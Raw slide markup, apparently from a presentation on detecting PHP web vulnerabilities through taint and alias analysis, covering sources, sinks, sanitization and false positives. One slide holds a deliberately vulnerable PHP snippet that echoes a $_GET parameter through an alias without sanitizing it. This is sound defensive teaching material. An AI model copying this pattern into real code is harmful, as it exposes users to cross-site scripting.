        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979712" y="305966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False</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="橢圓 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1259632" y="5805264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5" name="直線單箭頭接點 44"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="41" idx="2"/>
            <a:endCxn id="44" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1691680" y="5625244"/>
            <a:ext cx="36004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7" name="六邊形 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1223628" y="2348880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8" name="六邊形 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1007604" y="3537088"/>
            <a:ext cx="1728192" cy="648000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== "admin"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49" name="直線單箭頭接點 48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="40" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1691283" y="2168463"/>
            <a:ext cx="360040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0" name="直線單箭頭接點 49"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1619275" y="3249377"/>
            <a:ext cx="50326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2" name="直線單箭頭接點 51"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1605565" y="4459088"/>
            <a:ext cx="531477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27" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="33" grpId="0"/>
      <p:bldP spid="34" grpId="0"/>
      <p:bldP spid="35" grpId="0"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="37" grpId="0"/>
      <p:bldP spid="46" grpId="0" animBg="1"/>
      <p:bldP spid="82" grpId="0" animBg="1"/>
      <p:bldP spid="95" grpId="0"/>
      <p:bldP spid="106" grpId="0"/>
      <p:bldP spid="107" grpId="0"/>
      <p:bldP spid="40" grpId="0" animBg="1"/>
      <p:bldP spid="41" grpId="0" animBg="1"/>
      <p:bldP spid="42" grpId="0"/>
      <p:bldP spid="43" grpId="0"/>
      <p:bldP spid="44" grpId="0" animBg="1"/>
      <p:bldP spid="47" grpId="0" animBg="1"/>
      <p:bldP spid="4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 bwMode="auto">
          <a:xfrm>
            <a:off x="4499992" y="1484784"/>
            <a:ext cx="3960440" cy="3528392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u="sng" dirty="0"/>
              <a:t>Dependency Graph</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="18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Alias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  <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="群組 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="611560" y="1484784"/>
            <a:ext cx="3492388" cy="2160240"/>
            <a:chOff x="467544" y="1196752"/>
            <a:chExt cx="3492388" cy="2160240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="文字方塊 6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="467544" y="1196752"/>
              <a:ext cx="1403100" cy="36933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TW" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>PHP code</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US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467544" y="1556792"/>
              <a:ext cx="3492388" cy="1800200"/>
            </a:xfrm>
            <a:prstGeom prst="rect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01  &lt;?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php</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRP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02        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>$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</a:rPr>
                <a:t>a =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"message"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</a:rPr>
                <a:t>;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03        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>$b =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</a:rPr>
                <a:t>&amp;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>$a; </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRP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04        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>$a= $_GET[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err="1">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>msg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</a:rPr>
                <a:t>]; </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="342900" indent="-342900"/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05        echo $b;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="342900" indent="-342900"/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06  ?&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6300192" y="2132856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$_GET[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err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msg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</a:rPr>
              <a:t>], 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6696236" y="3069008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$a, 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5184068" y="3069008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$b,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5148064" y="4077120"/>
            <a:ext cx="108012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echo, 5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4" name="直線單箭頭接點 23"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="16" idx="2"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6948216" y="2816932"/>
            <a:ext cx="50415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6" name="直線單箭頭接點 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="2"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5400068" y="3789064"/>
            <a:ext cx="57611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7" name="矩形 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7308304" y="2636912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7308304" y="357301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1" name="矩形 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4499992" y="5013176"/>
            <a:ext cx="3960440" cy="864096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Alias Information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2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>must-alias{(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a,b</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)}</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              <a:cs typeface="Calibri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4716016" y="450912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49" name="矩形 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4716016" y="35010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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="弧形接點 35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6533424" y="2942152"/>
            <a:ext cx="1588" cy="1116124"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18824880"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="190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文字方塊 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6228184" y="3789040"/>
            <a:ext cx="72008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>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alias</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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8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7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7" grpId="0"/>
      <p:bldP spid="28" grpId="0"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="49" grpId="0"/>
      <p:bldP spid="48" grpId="0"/>
      <p:bldP spid="48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Detecting Vulnerabilities by Taint Analysis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Build control and data flow graphs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>All inputs from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> are considered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tainted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Data that depend on tainted data are also considered tainted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Some functions may be designated as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sanitization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> functions (for particular security vulnerabilities).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Values returned from a sanitization function are considered clean or untainted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Report vulnerabilities when tainted values are used in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>sink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>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Problems and Objectives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Three problems (among others) remain:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Existing code analysis tools report </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>too many false positives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>They rely on the programmer to ensure correctness of sanitization functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Many report </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>false negatives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> in some cases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Web application languages/frameworks are numerous and hard to catch up.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>We aim to solve the first three problems and alleviate the fourth.</a:t>
            </a:r>
          </a:p>
          <a:p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401080" cy="839787"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3800" dirty="0"/>
              <a:t>Use of a Code Analysis Tool</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="38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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文字方塊 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6015036" y="1584300"/>
            <a:ext cx="21288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</a:rPr>
              <a:t>Analysis results</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="右彎箭號 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6215061" y="1511286"/>
            <a:ext cx="500063" cy="1643062"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 375047 w 500062"/>
              <a:gd name="T1" fmla="*/ 0 h 1643062"/>
              <a:gd name="T2" fmla="*/ 375047 w 500062"/>
              <a:gd name="T3" fmla="*/ 250031 h 1643062"/>
              <a:gd name="T4" fmla="*/ 62508 w 500062"/>
              <a:gd name="T5" fmla="*/ 1643062 h 1643062"/>
              <a:gd name="T6" fmla="*/ 500062 w 500062"/>
              <a:gd name="T7" fmla="*/ 125016 h 1643062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0 w 500062"/>
              <a:gd name="T13" fmla="*/ 0 h 1643062"/>
              <a:gd name="T14" fmla="*/ 500062 w 500062"/>
              <a:gd name="T15" fmla="*/ 1643062 h 164306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00062" h="1643062">
                <a:moveTo>
                  <a:pt x="0" y="1643062"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="281285"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="160457"/>
                  <a:pt x="97949" y="62508"/>
                  <a:pt x="218776" y="62508"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="375047" y="62508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="375047" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="500062" y="125016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="375047" y="250031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="375047" y="187523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218777" y="187523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218776" y="187523"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="166993" y="187523"/>
                  <a:pt x="125015" y="229501"/>
                  <a:pt x="125015" y="281284"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="125016" y="1643062"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="00FF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rot="10800000" vert="eaVert"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  <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="右彎箭號 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="2428874" y="3725848"/>
            <a:ext cx="571500" cy="1857375"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 428625 w 571500"/>
              <a:gd name="T1" fmla="*/ 0 h 1857375"/>
              <a:gd name="T2" fmla="*/ 428625 w 571500"/>
              <a:gd name="T3" fmla="*/ 285750 h 1857375"/>
              <a:gd name="T4" fmla="*/ 71438 w 571500"/>
              <a:gd name="T5" fmla="*/ 1857375 h 1857375"/>
              <a:gd name="T6" fmla="*/ 571500 w 571500"/>
              <a:gd name="T7" fmla="*/ 142875 h 1857375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0 w 571500"/>
              <a:gd name="T13" fmla="*/ 0 h 1857375"/>
              <a:gd name="T14" fmla="*/ 571500 w 571500"/>
              <a:gd name="T15" fmla="*/ 1857375 h 18573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1500" h="1857375">
                <a:moveTo>
                  <a:pt x="0" y="1857375"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="321469"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="183380"/>
                  <a:pt x="111942" y="71438"/>
                  <a:pt x="250030" y="71438"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="428625" y="71438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="428625" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="571500" y="142875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="428625" y="285750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="428625" y="214313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250031" y="214313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250030" y="214313"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="190850" y="214313"/>
                  <a:pt x="142875" y="262288"/>
                  <a:pt x="142875" y="321468"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="142875" y="1857375"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="00FF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  <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="右彎箭號 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="5500687" y="4368785"/>
            <a:ext cx="1714500" cy="571500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1571625 w 1714500"/>
              <a:gd name="T1" fmla="*/ 0 h 571500"/>
              <a:gd name="T2" fmla="*/ 1571625 w 1714500"/>
              <a:gd name="T3" fmla="*/ 285750 h 571500"/>
              <a:gd name="T4" fmla="*/ 71438 w 1714500"/>
              <a:gd name="T5" fmla="*/ 571500 h 571500"/>
              <a:gd name="T6" fmla="*/ 1714500 w 1714500"/>
              <a:gd name="T7" fmla="*/ 142875 h 5715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0 w 1714500"/>
              <a:gd name="T13" fmla="*/ 0 h 571500"/>
              <a:gd name="T14" fmla="*/ 1714500 w 1714500"/>
              <a:gd name="T15" fmla="*/ 571500 h 5715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14500" h="571500">
                <a:moveTo>
                  <a:pt x="0" y="571500"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="321469"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="183380"/>
                  <a:pt x="111942" y="71438"/>
                  <a:pt x="250030" y="71438"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1571625" y="71438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1571625" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1714500" y="142875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1571625" y="285750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1571625" y="214313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250031" y="214313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250030" y="214313"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="190850" y="214313"/>
                  <a:pt x="142875" y="262288"/>
                  <a:pt x="142875" y="321468"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="142875" y="571500"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="00FF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  <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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4448" y="4021123"/>
            <a:ext cx="1500188" cy="130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文字方塊 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6015036" y="4957748"/>
            <a:ext cx="19859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</a:rPr>
              <a:t>Analysis report</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="右彎箭號 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1857374" y="2011348"/>
            <a:ext cx="1636713" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="bentArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 28558"/>
              <a:gd name="adj3" fmla="val 25000"/>
              <a:gd name="adj4" fmla="val 43750"/>
            </a:avLst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</a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14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11" y="3094033"/>
            <a:ext cx="14414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28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6929455" y="2436798"/>
            <a:ext cx="1533507" cy="7858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dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Manual review</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr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3626014" y="1357298"/>
            <a:ext cx="18746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Code analysis tool</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 24" descr="j028575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901699" y="3013062"/>
            <a:ext cx="1824038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Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="785786" y="2655870"/>
            <a:ext cx="9500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Website</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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3745335" y="5389548"/>
            <a:ext cx="16839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Review meeting</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文字方塊 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1285852" y="5009937"/>
            <a:ext cx="19859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</a:rPr>
              <a:t>Improvement recommendations</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文字方塊 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1214414" y="1369988"/>
            <a:ext cx="19859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</a:rPr>
              <a:t>Source code, Web pages</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文字方塊 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571472" y="5857892"/>
            <a:ext cx="78459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>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note: fewer false positives means less workload for the human reviewer.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note: there may be possible feedback loops between two tasks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="圖片 24" descr="CANTU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870" y="1811078"/>
            <a:ext cx="2000264" cy="92869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Challenges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Dynamic features of scripting languages popular for Web application development such as PHP:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Dynamic typing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Dynamic code generation and inclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Other difficult language features:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Aliases and hash tables</a:t>
            </a:r>
          </a:p>
